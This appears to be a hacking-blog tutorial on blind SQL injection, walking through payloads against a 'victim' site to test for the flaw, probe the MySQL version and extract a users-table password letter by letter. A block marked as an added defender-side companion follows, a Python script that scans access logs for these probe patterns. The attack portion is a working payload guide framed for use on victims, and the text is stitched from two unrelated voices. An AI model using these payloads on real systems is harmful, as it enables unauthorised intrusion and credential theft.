Welcome to TechynHacky :-)
Here I am Asman Mirza, and today I will show you Blind SQL Injection!
I mostly use ordinary SQL Injection myself, but sometimes the "union" command doesn't work or we don't get a version name;
that's why Blind SQL Injection is important too.
So let's start :-)
First find a victim site. Blind SQL Injection often works on pages vulnerable to ordinary SQL Injection too.
Well, our victim in this tut is:
http://www.vul-site.com/index.php?id=3
Testing if our victim is vulnerable or not:
Now we have to test if our victim is vulnerable to Blind SQL Injection.
Add this:
and 1 = 0
Example URL:
http://www.vul-site.com/index.php?id=3 and 1 = 0
Now we should get an error.
Now add this:
and 1 = 1
Example:
http://www.vul-site.com/index.php?id=3 and 1 = 1
Now we will see the website without an error message. That means that our victim is vulnerable.
Find out the MySQL version:
Now you have to add this:
and SUBSTRING(version(),1,1)=5
If you see the website without an error, the version is 5.
If you get an error, try 4 or 3.
Let's do the injection:
The way to do the injection is a bit different from the ordinary way. We don't search for tables etc., we only try to get
the password. First we try to get the first letter of the password. You will need an ASCII table for this.
Use this:
and ascii(substring((SELECT password from users limit 0,1),1,1))>70
We get an error: the ASCII value is too high. Let's try some lower value.
Try:
and ascii(substring((SELECT password from users limit 0,1),1,1))>64
Now we don't get an error. That means that the ASCII value is higher than 64.
Let's try 66:
and ascii(substring((SELECT password from users limit 0,1),1,1))>66
Now we get an error.
That means our ASCII value is too high. But we know that we didn't get an error at 65, so our ASCII value is 65.
Now check 65 in the ASCII table.
65 means "A", so the first letter of our password is "A".
Now we have to get the second letter.
and ascii(substring((SELECT password from users limit 0,1),2,1))>80
Result: error (too high)
and ascii(substring((SELECT password from users limit 0,1),2,1))>75
Result: no error (too low)
and ascii(substring((SELECT password from users limit 0,1),2,1))>76
Result: error
Now we know that the second letter of the password is ASCII 75.
Open your ASCII table and check which letter that is:
75 = K
Now we know the first two letters of the password: AK
Well, I think you know now how it works to get the next letters; you only have to change 2,1 into 3,1.
Example:
first letter: "and ascii(substring((SELECT password from users limit 0,1),1,1))>70"
second letter: "and ascii(substring((SELECT password from users limit 0,1),2,1))>70"
third letter: "and ascii(substring((SELECT password from users limit 0,1),3,1))>70"
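A defender-side companion to the procedure above, added here and not part of the original post: the probes shown ("and 1=0", "and 1=1", "ascii(substring(...))>N") leave a distinctive trail in web-server access logs, one request per comparison. This Python script (the log format and the sample lines are constructed assumptions) URL-decodes each query-string value, flags boolean-based blind probe patterns, and counts hits per client IP so that a burst of comparisons against the same parameter stands out.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Patterns typical of boolean-based blind probes as used in the post:
# tautology/contradiction tests and character-by-character ASCII comparisons.
BLIND_PATTERNS = [
    re.compile(r"\band\s+1\s*=\s*[01]\b", re.I),
    re.compile(r"\bascii\s*\(\s*substr(?:ing)?\s*\(", re.I),
    re.compile(r"\bsubstr(?:ing)?\s*\(\s*version\s*\(\s*\)", re.I),
]

# Constructed sample access-log lines in Common Log Format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=3 HTTP/1.1" 200 512
203.0.113.5 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?id=3%20and%201%3D0 HTTP/1.1" 200 88
203.0.113.5 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=3%20and%201%3D1 HTTP/1.1" 200 512
203.0.113.5 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?id=3+and+ascii(substring((SELECT+password+from+users+limit+0,1),1,1))%3E70 HTTP/1.1" 200 88
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?id=7 HTTP/1.1" 200 530
"""

# Minimal Common Log Format parser: client IP, request target, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r"(?P<status>\d{3}) (?P<size>\d+)"
)


def is_blind_probe(target: str) -> bool:
    """True if any query-string value looks like a boolean-based blind SQLi probe."""
    query = urlsplit(target).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decodes once; decode again to catch double-encoding.
        decoded = unquote_plus(value)
        if any(p.search(decoded) for p in BLIND_PATTERNS):
            return True
    return False


def count_probes(log_text: str) -> Counter:
    """Count flagged requests per client IP across a log body."""
    hits = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_blind_probe(m.group("target")):
            hits[m.group("ip")] += 1
    return hits


if __name__ == "__main__":
    for ip, n in count_probes(SAMPLE_LOG).most_common():
        print(f"{ip}: {n} blind-SQLi-style probe(s)")
```

A real deployment would feed the web server's live access log to count_probes and alert when one client exceeds a threshold of flagged requests against the same path within a short window, since legitimate users never send a series of such comparisons.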
Thanks for Reading n Visiting :-)